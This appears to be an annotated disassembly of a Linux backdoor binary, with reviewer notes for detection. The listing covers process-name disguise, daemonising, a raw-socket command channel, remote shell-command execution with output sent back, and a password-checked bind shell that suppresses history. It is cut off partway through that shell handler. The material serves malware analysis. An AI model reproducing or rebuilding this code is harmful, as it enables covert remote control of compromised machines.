;
; =========================================================================
;   This file is generated by The Interactive Disassembler (IDA)
;   Copyright (c) 2001 by DataRescue sa/nv,
;   Licensed to: M. D. Messier, Secure Software Solutions, std, 10/2001
; =========================================================================
;
; File Name   : M:\the-binary
; Format      : ELF (Executable)
;
; Reviewer notes (defensive summary of what the listing below shows):
;   * main exits unless geteuid() == 0, overwrites argv[0] with "[mingetty]",
;     forks twice around setsid(), does chdir("/") and closes fds 0-2.
;   * It then loops on recv() from a raw socket opened for IP protocol 0Bh and
;     only acts on packets whose byte at offset 14h is 2 and whose length is
;     greater than 0C8h.  Packets built by send_packet carry protocol 0Bh,
;     TTL 0FAh and the value 3 at offset 14h.
;   * Host artefacts named in this listing: the file "/tmp/.hj237349",
;     "/bin/csh -f -c" invoked through system(), and a TCP listener whose
;     sin_port word is 0F15Ah (see case0x5).
;   * The command handlers are reached through off_804832C, indexed by
;     cmdbuf[1] - 1, so the label caseN handles command byte N + 1.
;
; NOTE(review): the page this listing was taken from has lost its line breaks;
; they are restored here one statement per line.  In the macro below IDA
; normally emits angle-bracketed operands after "irpc c," and "ifnb" - they
; appear to have been stripped in extraction; confirm against the original.

unicode macro page,string,zero
        irpc c,
        db '&c', page
        endm
        ifnb
        dw zero
        endif
endm

        model flat

; -------------------------------------------------------------------------
; Segment type: Pure code
_init segment para public 'CODE' use32
        assume cs:_init
        ;org 8048080h
        assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; ======================= S U B R O U T I N E =============================
; Attributes: hidden
; Initialisation stub: calls sub_80675A8 (not part of this excerpt) and returns.

_init_proc proc near                    ; CODE XREF: start+51p
        call sub_80675A8
        retn 0
_init_proc endp

_init ends

; -------------------------------------------------------------------------
; Segment type: Pure code
_text segment para public 'CODE' use32
        assume cs:_text
        ;org 8048090h
        assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; Program entry point.  Derives argc/argv/envp from the initial stack, issues
; system call 136, initialises the FPU control word and the C library,
; registers _term_proc with atexit, runs _init_proc and then calls main,
; passing main's return value to exit.

start proc near

var_C = dword ptr -0Ch

        pop ecx                         ; argc
        mov ebx, esp                    ; argv
        mov eax, esp
        mov edx, ecx
        add edx, edx
        add edx, edx                    ; edx = argc * 4
        add eax, edx
        add eax, 4                      ; eax = argv + argc*4 + 4 (skips argv's terminator)
        xor ebp, ebp
        push ebp
        push ebp
        push ebp
        mov ebp, esp
        push eax                        ; environment pointer
        push ebx                        ; argument pointer
        push ecx                        ; argument count
        mov eax, 136
        mov ebx, 0
        int 80h                         ; LINUX - sys_personality
        mov eax, [esp+14h+var_C]
        mov __environ, eax              ; environment?
        movzx eax, __fpu_control
        push eax
        call __setfpucw
        add esp, 4
        call __libc_init
        push offset _term_proc
        call atexit
        add esp, 4
        call _init_proc
        call main
        push eax
        call exit
        pop ebx
        db 8Dh,0B4h,26h,0,0,0,0         ; lea esi, [esi+0]
        db 8Dh,0B4h,26h,0,0,0,0         ; lea esi, [esi+0]

loc_8048100:                            ; CODE XREF: start+77j
        mov eax, 1
        int 80h                         ; LINUX - sys_exit
        jmp short loc_8048100           ; retried forever if sys_exit ever returns
start endp

; -------------------------------------------------------------------------
        db 8Dh, 0B4h, 26h, 4 dup(0)

; ======================= S U B R O U T I N E =============================
; Attributes: hidden
; Calls every function pointer stored in the zero-terminated array that
; starts at dword_80792B8.  Does nothing when the first entry is zero.

sub_8048110 proc near                   ; CODE XREF: _term_procp
        push ebx
        mov ebx, offset dword_80792B8
        cmp ds:dword_80792B8, 0
        jz short loc_804812C
        nop

loc_8048120:                            ; CODE XREF: sub_8048110+1Aj
        mov eax, [ebx]
        call eax
        add ebx, 4
        cmp dword ptr [ebx], 0
        jnz short loc_8048120

loc_804812C:                            ; CODE XREF: sub_8048110+Dj
        pop ebx
        retn
sub_8048110 endp

; -------------------------------------------------------------------------
        db 8Dh, 36h
; -------------------------------------------------------------------------
        retn
; -------------------------------------------------------------------------
        db 3 dup(90h)

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; main: privilege check, process-name overwrite, daemonisation, then an
; endless receive/dispatch loop (process_command_packet) driven by packets
; read from a raw IP-protocol-0Bh socket.
;
; Stack layout facts that follow from the offsets below:
;   addrlist  -11B8h .. -1190h  = 28h bytes (ten 4-byte address slots)
;   buf400    -1190h .. -1000h  = 190h bytes
;   cmdbuf    -1000h .. -800h   = 800h bytes (decoded command)
;   tmpbuf    -800h  .. 0       = 800h bytes (raw receive buffer / scratch)

main proc near                          ; CODE XREF: start+56p

numhosts = dword ptr -44F0h
var_44EC = dword ptr -44ECh
ptr_buf400 = dword ptr -44E8h
ptr_addrlist = dword ptr -44E4h
ptr_cmdbuf = dword ptr -44E0h
fd = dword ptr -44DCh
ptr_data = dword ptr -44D8h
ptr_datahdr = dword ptr -44D4h
ptr_tmpbuf = dword ptr -44D0h
clientfd = dword ptr -44CCh
sockfd = dword ptr -44C8h
init_as_16 = dword ptr -44C4h
init_as_1 = dword ptr -44C0h
var_44BC = byte ptr -44BCh
var_43BC = byte ptr -43BCh
accept_addr = byte ptr -11D8h
listen_addr = byte ptr -11C8h
addrlist = byte ptr -11B8h
buf400 = byte ptr -1190h
cmdbuf = byte ptr -1000h
tmpbuf = byte ptr -800h
argc = dword ptr 8
argv = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 44F0h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+argv]
        mov [ebp+init_as_1], 1
        lea edx, [ebp+tmpbuf]
        mov [ebp+ptr_tmpbuf], edx       ; &tmpbuf
        lea ecx, [ebp+tmpbuf+14h]
        mov [ebp+ptr_datahdr], ecx      ; tmpbuf + 14h: first byte after a 20-byte IP header
        lea edx, [ebp+tmpbuf+16h]
        mov [ebp+ptr_data], edx         ; tmpbuf + 16h: payload after the 2-byte data header
        mov [ebp+init_as_16], 10h
        call geteuid
        test eax, eax                   ; check for super-user
        jz short loc_804818C            ; yes, we're superuser!
        push 0FFFFFFFFh                 ; no, we're not
        call exit
        nop

loc_804818C:                            ; CODE XREF: main+4Ej
        ; strlen(argv[0]) via repne scasb, then memset(argv[0], 0, len).
        mov edx, [ebx]
        xor al, al
        mov edi, edx
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov eax, ecx
        not eax
        dec eax
        push eax
        push 0
        push edx
        call memset
        ; Copy the 11 bytes at aMingetty (offsets 0..0Ah) over argv[0];
        ; presumably so process listings show "[mingetty]" instead of the
        ; real program name.  The copy length is fixed and does not depend
        ; on the original argv[0] length.
        mov edx, [ebx]
        mov eax, dword ptr ds:aMingetty ; "[mingetty]"
        mov [edx], eax
        mov eax, dword ptr ds:aMingetty+4
        mov [edx+4], eax
        mov ax, word ptr ds:aMingetty+8
        mov [edx+8], ax
        mov al, byte ptr ds:aMingetty+0Ah
        mov [edx+0Ah], al
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal
        call fork                       ; first fork: the parent exits below
        add esp, 14h
        test eax, eax
        jz short loc_80481E8
        push 0
        call exit

loc_80481E8:                            ; CODE XREF: main+ABj
        call setsid                     ; new session for the surviving child
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal
        call fork                       ; second fork: the parent exits below
        add esp, 8
        test eax, eax
        jz short loc_804820C
        push 0
        call exit
        db 8Dh,76h,0                    ; lea esi, [esi+0] ; *NOTREACHED*

loc_804820C:                            ; CODE XREF: main+CCj
        push offset aSlash              ; "/"
        call chdir                      ; chdir("/")
        push 0
        call close                      ; close(fileno(stdin))
        push 1
        call close                      ; close(fileno(stdout))
        push 2
        call close                      ; close(fileno(stderr))
        mov ds:child_pid, 0
        mov ds:dword_807E770, 0
        mov ds:dword_807E778, 0
        push 0
        call time
        add esp, 14h                    ; cleanup previous 5 calls
        push eax
        call __srandom                  ; srandom(time(0))
        add esp, 4
        push 0Bh                        ; NVP-II
        push 3                          ; SOCK_RAW
        push 2                          ; PF_INET
        call socket                     ; socket(PF_INET, SOCK_RAW, 0Bh); return value is not checked
        mov [ebp+sockfd], eax
        push 1                          ; SIG_IGN
        push 1                          ; SIGHUP
        call signal
        push 1                          ; SIG_IGN
        push 0Fh                        ; SIGTERM
        call signal
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal
        add esp, 24h                    ; clean up socket() and the previous 3 signal() calls
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal
        add esp, 8
        lea ecx, [ebp+cmdbuf]
        mov [ebp+ptr_cmdbuf], ecx
        lea edx, [ebp+addrlist]
        mov [ebp+ptr_addrlist], edx
        nop

process_command_packet:                 ; CODE XREF: main+D91j
        ; Top of the receive loop.  Every handler that does not exit jumps to
        ; loc_8048EB8, which sleeps 2710h microseconds and comes back here.
        push 0                          ; flags
        push 800h                       ; bufferlen
        lea eax, [ebp+tmpbuf]
        push eax                        ; buffer
        mov ecx, [ebp+sockfd]
        push ecx                        ; sockfd
        call recv
        mov esi, eax                    ; # bytes received
        add esp, 10h
        mov edx, [ebp+ptr_tmpbuf]
        cmp byte ptr [edx+9], 0Bh       ; check protocol in iphdr
        jnz loc_8048EB8                 ; default
        mov ecx, [ebp+ptr_datahdr]
        cmp byte ptr [ecx], 2           ; first data byte must be 2
        jnz loc_8048EB8                 ; default
        cmp esi, 0C8h                   ; packet length (incl. iphdr) must be greater than 200 bytes (jle rejects <= 0C8h)
        jle loc_8048EB8                 ; default
        ; No sender check is visible here: any packet passing the three tests
        ; above is decoded and dispatched.
        mov edx, [ebp+ptr_cmdbuf]
        push edx                        ; destination buffer
        mov ecx, [ebp+ptr_data]
        push ecx                        ; source (2 bytes offset into data rec'd)
        lea eax, [esi-16h]
        push eax                        ; number of bytes in the source buffer
        call decode_input               ; decode_input(len, src, dst)
        add esp, 0Ch
        movzx eax, [ebp+cmdbuf+1]       ; 2nd char of destination buffer
        dec eax
        cmp eax, 0Bh                    ; switch 12 cases
        ja loc_8048EB8                  ; default
        jmp ds:off_804832C[eax*4]       ; switch (cmdbuf[1] - 1)

; -------------------------------------------------------------------------
off_804832C dd offset case0x0           ; DATA XREF: main+1F1r
                                        ; jump table for switch statement
        dd offset case0x1               ; case 0x1
        dd offset case0x2               ; case 0x2
        dd offset case0x3               ; case 0x3
        dd offset case0x4               ; case 0x4
        dd offset case0x5               ; case 0x5
        dd offset case0x6               ; case 0x6
        dd offset case0x7               ; case 0x7
        dd offset case0x8               ; case 0x8
        dd offset case0x9               ; case 0x9
        dd offset case0xa               ; case 0xa
        dd offset case0xb               ; case 0xb
; -------------------------------------------------------------------------

; case0x0 - status reply.  Builds a 5-byte record in tmpbuf:
;   [0] low byte of dword_807E77C, [1] = 1, [2] = 7,
;   [3] = 1 and [4] = low byte of dword_807E778 when child_pid is non-zero,
;   [3] = 0 otherwise.
; The record is passed through encode_input into cmdbuf and handed to
; broadcast_packet with a length of 190h + (random() mod 0C9h).

case0x0:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+1F8o
        mov al, ds:null_byte            ; case 0x0
        mov [ebp+tmpbuf], al            ; put null at start of tmpbuf
        mov eax, ds:dword_807E77C
        mov [ebp+tmpbuf], al            ; immediately overwritten with the low byte of dword_807E77C
        mov [ebp+tmpbuf+1], 1
        mov [ebp+tmpbuf+2], 7
        cmp ds:child_pid, 0
        jz short loc_80483A0
        mov [ebp+tmpbuf+3], 1
        mov eax, ds:dword_807E778       ; should be 0 initially
        mov [ebp+tmpbuf+4], al
        jmp short loc_80483A7

; -------------------------------------------------------------------------
        db 8Dh, 36h
; -------------------------------------------------------------------------

loc_80483A0:                            ; CODE XREF: main+254j
        mov [ebp+tmpbuf+3], 0

loc_80483A7:                            ; CODE XREF: main+268j
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        lea eax, [ebp+tmpbuf]
        push eax
        push 190h
        call encode_input               ; encode_input(190h, tmpbuf, cmdbuf)
        call random
        mov ecx, 0C9h
        cdq                             ; sign extend eax random result into edx:eax quadword - edx will be filled with sign bit of original eax
        idiv ecx                        ; mod random quadword by 0xC9
        mov ebx, edx                    ; put mod doubleword of result in ebx
        lea eax, [ebx+190h]             ; range is 400 to 600
        push eax
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        mov ecx, [ebp+ptr_addrlist]
        push ecx
        call broadcast_packet           ; func( char * to 40 byte buff, char * to cmdbuff, whacked random number)
        add esp, 18h
        jmp loc_8048EB8                 ; default

; -------------------------------------------------------------------------

; case0x1 - configure reply addressing.
;   * cmdbuf[2] is stored in cmdbuffbyte1 (mode used below and by
;     broadcast_packet).
;   * Bytes 10h..13h of the received buffer are saved at dataptr and
;     byte_807E781..byte_807E783; send_packet later uses them as the source
;     address.  Given the protocol test at offset 9, these are presumably the
;     destination-address field of the received IP header - confirm.
;   * The ten 4-byte slots of addrlist are then filled, skipping slot
;     edi = random() mod 0Ah: from cmdbuf+3 onward when the mode is 2,
;     with bytes taken from random() otherwise.
;   * For modes other than 2, cmdbuf[3..6] is written into slot edi
;     (slot 0 when the mode is 0).

case0x1:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+1FCo
        movzx edx, [ebp+cmdbuf+2]       ; case 0x1
        mov ds:cmdbuffbyte1, edx
        mov al, [ebp+tmpbuf+10h]
        mov ds:dataptr, al
        mov al, [ebp+tmpbuf+11h]
        mov ds:byte_807E781, al
        mov al, [ebp+tmpbuf+12h]
        mov ds:byte_807E782, al
        mov al, [ebp+tmpbuf+13h]
        mov ds:byte_807E783, al
        push 0
        call time
        add esp, 4
        push eax
        call __srandom                  ; reseed: srandom(time(0))
        add esp, 4
        call random
        mov ecx, 0Ah
        cdq
        idiv ecx
        mov edi, edx                    ; edi = random() mod 10: slot reserved for cmdbuf[3..6]
        xor ebx, ebx                    ; ebx = slot index
        xor esi, esi                    ; esi = byte offset of the slot (ebx * 4)
        nop

loc_8048454:                            ; CODE XREF: main+3FEj
        cmp ebx, edi
        jz loc_804852B                  ; leave the reserved slot untouched in this loop
        cmp ds:cmdbuffbyte1, 2
        jnz short loc_8048498
        ; mode 2: copy four bytes from cmdbuf + 3 + 4*ebx
        mov al, [ebp+ebx*4+cmdbuf+3]
        mov edx, [ebp+ptr_addrlist]
        mov [edx+esi], al
        mov al, [ebp+ebx*4+cmdbuf+4]
        mov [esi+edx+1], al
        mov al, [ebp+ebx*4+cmdbuf+5]
        mov [esi+edx+2], al
        mov al, [ebp+ebx*4+cmdbuf+6]
        jmp loc_8048527

; -------------------------------------------------------------------------
        align 4

loc_8048498:                            ; CODE XREF: main+32Fj
        ; other modes: each of the four bytes is the low byte of a fresh
        ; random() result (the numhosts stores are only scratch here).
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484B3
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484B3:                            ; CODE XREF: main+371j
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484D7
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484D7:                            ; CODE XREF: main+395j
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx+1], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484FC
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484FC:                            ; CODE XREF: main+3BAj
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx+2], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_8048521
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_8048521:                            ; CODE XREF: main+3DFj
        mov edx, [ebp+ptr_addrlist]

loc_8048527:                            ; CODE XREF: main+35Ej
        mov [esi+edx+3], al

loc_804852B:                            ; CODE XREF: main+322j
        add esi, 4
        inc ebx
        cmp ebx, 9
        jle loc_8048454
        mov eax, ds:cmdbuffbyte1
        test eax, eax
        jnz short loc_8048543
        xor edi, edi                    ; mode 0: use slot 0

loc_8048543:                            ; CODE XREF: main+40Bj
        cmp eax, 2
        jz loc_8048EB8                  ; default
        shl edi, 2
        mov [ebp+var_44EC], edi
        mov al, [ebp+cmdbuf+3]
        mov ecx, [ebp+ptr_addrlist]
        mov [edi+ecx], al
        mov al, [ebp+cmdbuf+4]
        mov edx, [ebp+var_44EC]
        mov [edx+ecx+1], al
        mov al, [ebp+cmdbuf+5]
        mov [edx+ecx+2], al
        mov al, [ebp+cmdbuf+6]
        mov [edx+ecx+3], al
        jmp loc_8048EB8                 ; default

; -------------------------------------------------------------------------
        db 8Dh, 76h, 0
; -------------------------------------------------------------------------

; case0x2 - run a command string and send its output back.
;   * fork; the original process records the pid in dword_807E770 and returns
;     to the receive loop.
;   * The child calls setsid and forks again.  The intermediate process
;     sleeps 0Ah seconds and then calls kill(dword_807E770, 9); in this child
;     dword_807E770 holds fork's return value 0, and kill(2) with pid 0
;     signals the caller's process group - i.e. a 10-second time limit.
;   * The grandchild drops the first two bytes of cmdbuf, formats
;     "/bin/csh -f -c \"%s\" 1> %s 2>&1" with that string and
;     "/tmp/.hj237349", and passes the result to system().  The string comes
;     straight from the decoded packet.
;   * The output file is read back in 18Eh-byte chunks; each chunk is sent
;     via encode_input/broadcast_packet with cmdbuf[1] = 3 for the first
;     chunk and 4 for the following ones, 61A80h microseconds apart.
;   * The file is closed and unlinked afterwards.

case0x2:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+200o
        call fork                       ; case 0x2
        mov ds:dword_807E770, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        call setsid
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal
        call fork
        add esp, 8
        test eax, eax
        jz short loc_80485D8
        push 0Ah
        call sleep                      ; sleep(10)
        push 9
        mov eax, ds:dword_807E770
        push eax
        call kill                       ; kill(dword_807E770, 9)
        push 0
        call exit
        nop

loc_80485D8:                            ; CODE XREF: main+486j
        xor ebx, ebx
        lea esi, [esi]

loc_80485DC:                            ; CODE XREF: main+4BDj
        ; cmdbuf[i] = cmdbuf[i + 2] for i = 0..18Dh (strip the 2-byte header)
        mov al, [ebx+ebp-0FFEh]
        mov [ebx+ebp-1000h], al
        inc ebx
        cmp ebx, 18Dh
        jle short loc_80485DC
        push offset aTmp_hj237349       ; "/tmp/.hj237349"
        mov ecx, [ebp+ptr_cmdbuf]
        push ecx
        push offset aBinCshFCS1S21      ; "/bin/csh -f -c \"%s\" 1> %s 2>&1"
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf                    ; sprintf(tmpbuf, fmt, cmdbuf, "/tmp/.hj237349")
        push ebx
        call system                     ; system(tmpbuf)
        push offset aRb                 ; "rb"
        push offset aTmp_hj237349       ; "/tmp/.hj237349"
        call fopen
        mov [ebp+fd], eax
        add esp, 1Ch
        test eax, eax
        jz loc_8048712
        xor edi, edi                    ; edi = 0 until the first chunk has been sent
        lea edx, [ebp+buf400]
        mov [ebp+ptr_buf400], edx

loc_8048644:                            ; CODE XREF: main+5BFj
        mov ecx, [ebp+fd]
        push ecx
        push 18Eh
        push 1
        lea eax, [ebp+tmpbuf]
        push eax
        call fread                      ; fread(tmpbuf, 1, 18Eh, fd)
        mov esi, eax                    ; esi = bytes read
        mov [esi+ebp+tmpbuf], 0         ; NUL-terminate the chunk
        xor ebx, ebx
        add esp, 10h
        db 8Dh,76h,0                    ; lea esi, [esi+0]

loc_8048670:                            ; CODE XREF: main+551j
        ; cmdbuf[2 + i] = tmpbuf[i] for i = 0..18Dh
        mov al, [ebx+ebp+tmpbuf]
        mov [ebx+ebp+cmdbuf+2], al
        inc ebx
        cmp ebx, 18Dh
        jle short loc_8048670
        test edi, edi
        jnz short loc_804869C
        mov [ebp+cmdbuf+1], 3           ; first chunk
        mov edi, 1
        jmp short loc_80486A3

; -------------------------------------------------------------------------
        db 8Dh, 76h, 0
; -------------------------------------------------------------------------

loc_804869C:                            ; CODE XREF: main+555j
        mov [ebp+cmdbuf+1], 4           ; continuation chunk

loc_80486A3:                            ; CODE XREF: main+563j
        mov edx, [ebp+ptr_buf400]
        push edx
        mov ecx, [ebp+ptr_cmdbuf]
        push ecx
        push 190h
        call encode_input               ; encode_input(190h, cmdbuf, buf400)
        call random
        mov ecx, 0C9h
        cdq
        idiv ecx
        mov ebx, edx
        lea eax, [ebx+190h]             ; length 190h + (random() mod 0C9h); may exceed the 190h bytes of buf400
        push eax
        mov edx, [ebp+ptr_buf400]
        push edx
        mov ecx, [ebp+ptr_addrlist]
        push ecx
        call broadcast_packet
        push 61A80h
        call usleep
        add esp, 1Ch
        test esi, esi
        jnz loc_8048644                 ; loop until fread returns 0
        mov edx, [ebp+fd]
        push edx
        call fclose
        push offset aTmp_hj237349       ; "/tmp/.hj237349"
        call unlink
        add esp, 8

loc_8048712:                            ; CODE XREF: main+4FCj
        push 0
        call _exit
        db 8Dh,76h,0                    ; lea esi, [esi+0]

; case0x3 - only when no worker child is recorded in child_pid.
; Sets dword_807E778 = 4, forks and stores the pid in child_pid; the child
; copies 0FFh bytes of cmdbuf to var_44BC, moves the bytes at var_44BC+9
; down to its start, and calls
;   sub_8049174(cmdbuf[2], cmdbuf[3], cmdbuf[4], cmdbuf[5], 0,
;               cmdbuf[6], cmdbuf[7], cmdbuf[8], var_44BC)
; then _exit(0).  sub_8049174 starts near the end of this listing.

case0x3:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+204o
        cmp ds:child_pid, 0             ; case 0x3
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 4
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb                           ; 3Fh*4 + 2 + 1 = 0FFh bytes copied
        xor ebx, ebx
        lea esi, [esi]

loc_8048760:                            ; CODE XREF: main+641j
        mov al, [ebx+ebp-44B3h]         ; var_44BC + 9 + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048760
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        push 0
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049174
        add esp, 24h
        push 0
        call _exit
        nop

; case0x4 - same guard/fork pattern with dword_807E778 = 5.  The child moves
; the bytes at var_44BC+0Dh down to the start of the buffer and calls
; sub_80499F4 with cmdbuf[2]..cmdbuf[0Ch] followed by var_44BC.
; sub_80499F4 is not part of this excerpt.

case0x4:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+208o
        cmp ds:child_pid, 0             ; case 0x4
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 5
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_804880C:                            ; CODE XREF: main+6EDj
        mov al, [ebx+ebp-44AFh]         ; var_44BC + 0Dh + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_804880C
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_80499F4
        add esp, 30h
        push 0
        call _exit
        db 8Dh,76h,0                    ; lea esi, [esi+0]

; case0x5 - TCP listener that hands a connection to /bin/sh.
;   * Guarded by child_pid like the other worker cases; dword_807E778 = 6.
;   * The child binds INADDR_ANY with the sin_port word 0F15Ah.  The word is
;     stored little-endian, so the port field holds bytes 5Ah F1h, which read
;     in network byte order is 5AF1h (23281 decimal).
;   * Each accepted connection is handled in a further fork.  Up to 13h bytes
;     are read; CR/LF bytes are replaced by 0 and every other byte is
;     incremented by one before a 6-byte compare against aTfojg.
;   * On mismatch 4 bytes from unk_806761D are sent and the child exits.
;   * On match the socket is dup2'ed onto fds 0-2, PATH and TERM are set,
;     HISTFILE is removed from the environment, and execl runs
;     "/bin/sh" as "sh".
; Detection-relevant points: a root-owned listener on that port, and shells
; whose HISTFILE is unset so no history file is written.

case0x5:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+20Co
        cmp ds:child_pid, 0             ; case 0x5
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 6
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal                     ; signal(SIGCHLD, SIG_IGN)
        call fork
        mov ds:child_pid, eax
        add esp, 8
        test eax, eax
        jnz loc_8048EB8                 ; default
        call setsid
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal                     ; signal(SIGCHLD, SIG_IGN)
        mov word ptr [ebp+listen_addr], 2 ; listen_addr.sin_family = AF_INET
        add esp, 8
        mov word ptr [ebp+listen_addr+2], 0F15Ah ; listen_addr.sin_port = 0xF15A
        mov dword ptr [ebp+listen_addr+4], 0 ; listen_addr.sin_addr.s_addr = INADDR_ANY
        mov [ebp+init_as_1], 1          ; option value for SO_REUSEADDR below
        push 0
        push 1                          ; SOCK_STREAM
        push 2                          ; PF_INET
        call socket                     ; socket(PF_INET, SOCK_STREAM, 0)
        mov [ebp+sockfd], eax
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal                     ; signal(SIGCHLD, SIG_IGN)
        push 1                          ; SIG_IGN
        push 11h                        ; SIGCHLD
        call signal                     ; signal(SIGCHLD, SIG_IGN)
        push 1                          ; SIG_IGN
        push 1                          ; SIGHUP
        call signal                     ; signal(SIGHUP, SIG_IGN)
        add esp, 24h
        push 1                          ; SIG_IGN
        push 0Fh                        ; SIGTERM
        call signal                     ; signal(SIGTERM, SIG_IGN)
        push 1                          ; SIG_IGN
        push 2                          ; SIGINT
        call signal                     ; signal(SIGINT, SIG_IGN)
        push 4                          ; sizeof(int)
        lea eax, [ebp+init_as_1]
        push eax                        ; &init_as_1
        push 2                          ; SO_REUSEADDR
        push 1                          ; SOL_SOCKET
        mov ecx, [ebp+sockfd]
        push ecx                        ; sockfd
        call setsockopt                 ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &init_as_1, sizeof(int))
        add esp, 24h
        push 10h                        ; sizeof(listen_addr)
        lea eax, [ebp+listen_addr]
        push eax                        ; &listen_addr
        mov edx, [ebp+sockfd]
        push edx                        ; sockfd
        call bind                       ; bind(sockfd, &listen_addr, sizeof(listen_addr))
        push 3
        mov ecx, [ebp+sockfd]
        push ecx                        ; sockfd
        call listen                     ; listen(sockfd, 3)
        add esp, 14h
        nop

loc_8048984:                            ; CODE XREF: main+882j
        lea eax, [ebp+init_as_16]
        push eax                        ; &init_as_16
        lea eax, [ebp+accept_addr]
        push eax                        ; &accept_addr
        mov edx, [ebp+sockfd]
        push edx                        ; sockfd
        call accept                     ; accept(sockfd, &accept_addr, &init_as_16)
        mov [ebp+clientfd], eax
        add esp, 0Ch
        test eax, eax
        jz loc_8048AC4                  ; only a return value of 0 ends the loop
        call fork
        test eax, eax
        jnz short loc_8048984           ; listener goes back to accept(); clientfd is not closed on this path
        push 0
        push 13h
        lea eax, [ebp+var_43BC]
        push eax                        ; var_43BC
        mov ecx, [ebp+clientfd]
        push ecx                        ; clientfd
        call recv                       ; recv(clientfd, var_43BC, 0x13, 0)
        xor ebx, ebx
        add esp, 10h

loc_80489D4:                            ; CODE XREF: main+8CEj
        ; Transform bytes 0..12h of var_43BC in place.
        mov al, [ebx+ebp+var_43BC]
        cmp al, 0Ah
        jz short loc_80489E3
        cmp al, 0Dh
        jnz short loc_80489F0

loc_80489E3:                            ; CODE XREF: main+8A9j
        mov [ebx+ebp+var_43BC], 0       ; LF or CR becomes NUL
        jmp short loc_80489FE

; -------------------------------------------------------------------------
        db 8Dh, 76h, 0
; -------------------------------------------------------------------------

loc_80489F0:                            ; CODE XREF: main+8ADj
        mov [ebx+ebp+var_43BC], al
        inc [ebx+ebp+var_43BC]          ; any other byte is incremented by one

loc_80489FE:                            ; CODE XREF: main+8B7j
        inc ebx
        cmp ebx, 12h
        jle short loc_80489D4
        lea esi, [ebp+var_43BC]
        mov edi, offset aTfojg          ; "TfOjG"
        mov ecx, 6
        cld
        test al, 0
        repe cmpsb                      ; compare 6 bytes (string plus terminator)
        jz short loc_8048A44
        push 0
        push 4
        push offset unk_806761D
        mov edx, [ebp+clientfd]
        push edx
        call send                       ; send(clientfd, unk_806761D, 4, 0)
        mov ecx, [ebp+clientfd]
        push ecx
        call close
        push 1
        call exit
        nop

loc_8048A44:                            ; CODE XREF: main+8E5j
        push 0
        mov edx, [ebp+clientfd]
        push edx
        call dup2                       ; dup2(clientfd, 0)
        push 1
        mov ecx, [ebp+clientfd]
        push ecx
        call dup2                       ; dup2(clientfd, 1)
